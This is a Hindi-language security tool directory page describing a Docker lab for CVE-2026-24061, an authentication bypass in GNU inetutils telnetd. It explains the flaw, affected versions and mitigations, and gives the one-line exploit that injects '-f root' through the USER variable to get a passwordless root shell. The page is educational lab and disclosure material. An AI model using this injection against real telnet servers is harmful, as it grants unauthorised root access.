Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
telnet-inetutils-auth-bypass-CVE-2026-24061 — यह एक सरल PoC है जो आपको वर्तमान में चल रहे और सक्रिय रूप से शोषित Telnet बग की गंभीरता को उजागर करने की अनुमति देता है। लोग अभी भी Telnet का उपयोग क्यों कर रहे हैं... मेरी समझ से परे है। | Kitploit
उपकरण/GitHubGitHub/jakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubjakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061

telnet-inetutils-auth-bypass-CVE-2026-24061

यह एक सरल PoC है जो आपको वर्तमान में चल रहे और सक्रिय रूप से शोषित Telnet बग की गंभीरता को उजागर करने की अनुमति देता है। लोग अभी भी Telnet का उपयोग क्यों कर रहे हैं... मेरी समझ से परे है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
16 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-24061: GNU inetutils-telnetd प्रमाणीकरण बाईपास

CVE-2026-24061 को प्रदर्शित करने के लिए एक Docker लैब — GNU inetutils telnetd में एक गंभीर प्रमाणीकरण बाईपास भेद्यता जो 11 वर्षों तक अनपैच रही।

भेद्यता

Telnetd USER पर्यावरण चर को बिना किसी सैनिटाइज़ेशन के सीधे /usr/bin/login को पास करता है। login बाइनरी में एक -f फ्लैग होता है जो प्रमाणीकरण को छोड़ देता है (पूर्व-प्रमाणित सत्रों के लिए अभिप्रेत)। USER='-f root' सेट करके, एक हमलावर login को बिना पासवर्ड के रूट एक्सेस देने के लिए धोखा देता है।

प्रभावित संस्करण: GNU inetutils 1.9.3 (मार्च 2015) से 2.7 तक CVSS स्कोर: 9.8 (क्रिटिकल) समाधान: inetutils 2.8+ में अपडेट करें

त्वरित प्रारंभ

root@kitploit:~
# इमेज बनाएं
docker build -t telnetd-exploit .

# कंटेनर चलाएं (आपको user1 के रूप में शेल में डालता है)
docker run --rm -it telnetd-exploit

# एक्सप्लॉइट — बिना पासवर्ड के रूट प्राप्त करें
USER='-f root' telnet -a localhost

आप रूट शेल में पहुंच जाएंगे। पुष्टि करने के लिए whoami चलाएं।

यह कैसे काम करता है

root@kitploit:~
1. क्लाइंट कनेक्ट करता है: USER='-f root' telnet -a localhost
2. telnetd USER पर्यावरण चर प्राप्त करता है: "-f root"
3. telnetd निष्पादित करता है: /usr/bin/login -f root
4. login -f को "प्रमाणीकरण छोड़ें, उपयोगकर्ता पूर्व-सत्यापित है" के रूप में व्याख्या करता है
5. हमलावर को रूट शेल मिलता है — कोई पासवर्ड आवश्यक नहीं

-f क्यों मौजूद है

-f फ्लैग वैध है — यह उन परिदृश्यों के लिए है जहां उपयोगकर्ता पहले से प्रमाणित है (जैसे, विश्वसनीय स्थानीय सत्र से)। बग यह है कि telnetd login को पास करने से पहले USER चर को सैनिटाइज़ नहीं करता, जिससे दूरस्थ हमलावर फ्लैग इंजेक्ट कर सकते हैं।

प्रभाव

जनवरी 2026 तक:

  • ~800,000 Telnet सर्वर वैश्विक रूप से उजागर (Shadowserver)
  • ~290,000 Shodan पर अनुक्रमित
  • भेद्यता सक्रिय रूप से जंगली में शोषित (CISA KEV कैटलॉग)

आपको Telnet का उपयोग क्यों नहीं करना चाहिए

इस बग के बिना भी, Telnet सब कुछ प्लेनटेक्स्ट में प्रसारित करता है — पासवर्ड सहित। इसके बजाय SSH का उपयोग करें।

प्रोटोकॉलएन्क्रिप्शनप्रमाणीकरण
Telnetकोई नहींप्लेनटेक्स्ट
SSHहाँकुंजी/पासवर्ड

फ़ाइलें

root@kitploit:~
.
├── Dockerfile              # भेद्य Debian कंटेनर बनाता है
├── docker-entrypoint.sh    # inetd शुरू करता है, user1 पर गिरता है
└── README.md

शमन

  1. अपडेट करें GNU inetutils 2.8+ पर
  2. telnetd अक्षम करें — पोर्ट 23 ब्लॉक करें
  3. SSH का उपयोग करें — यह 2026 है

संदर्भ

  • CVE-2026-24061
  • मूल सलाह
  • CISA KEV प्रविष्टि

श्रेय

लैब leonjza/inetutils-telnetd-auth-bypass पर आधारित है

टूल डाउनलोड करें